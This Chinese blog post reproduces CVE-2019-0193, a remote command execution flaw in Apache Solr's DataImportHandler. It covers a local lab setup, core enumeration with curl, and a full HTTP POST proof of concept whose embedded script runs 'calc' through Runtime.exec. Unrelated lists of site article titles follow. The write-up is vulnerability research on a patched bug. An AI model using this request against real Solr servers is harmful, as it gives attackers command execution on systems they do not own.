CVE-2019-0193:Apache Solr 远程命令执行漏洞复现
2024-09-02 17:57:10
0x00 漏洞背景
2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重
0x01 影响范围
Apache Solr < 8.2.0
0x02 环境搭建
下载地址https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
在本地解压,进入solr-7.7.2目录,执行命令 bin/solr -e dih (前提:java环境)
然后访问http://localhost:8983/solr即可访问环境
0x03 漏洞利用
首先我们可以通过接口 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息
在Burp中发送以下POC即可执行命令弹出计算器,下面的 <your_core_name> 需要替换为你获取到的 core 的 name(共两处)
POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
执行效果如下:
如果想了解最新漏洞复现过程,欢迎扫码关注 Timeline Sec 公众号!
最新文章
- 使用 Flash Builder 的 Apple iOS 开发过程
- CSS元素分类及区别
- 8.1 Optimization Overview
- webpack图片的路径与打包
- mciSendString用法
- HDU 1079 Calendar Game 博弈
- MapReduce 简单的全文搜索
- 这个demo是为解决IQKeyboardManager和Masonry同时使用时,导航栏上移和make.right失效的问题
- lazy ideas in programming(编程中的惰性思想)
- HTML知识点总结之表单元素
- OFBiz项目简介
- ionic 3 安卓手机获取经纬度坐标
- Ruby语法基础(一)
- python中的多进程与多线程(一)
- 【PAT】B1080 MOOC期终成绩(25 分)
- Android通用简洁的下载器
- 深入理解yield(二):yield与协程
- trsd_extract_EDSD_new
- Python 数据结构与算法——冒泡排序
- 3星|《规避政治风险:全球化企业必修课》:中国将赢得5G竞争
热门文章
- Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) 解决办法
- MacbookPro15 2019 闪屏雪花现象方案汇总
- Hadoop window win10 基础环境搭建(2.8.1)(转)
- 【ARM-Linux开发】Makefile 使用总结
- PHP设计模式 - 命令模式
- Java开发笔记(一百五十一)Druid连接池的用法
- Python之路【第二十六篇】:HTTP协议
- vue 路由跳转带参 方式query ,params
- mPass多租户系统微服务开发平台
- 防止用户重复提交表单数据,session方式,js方式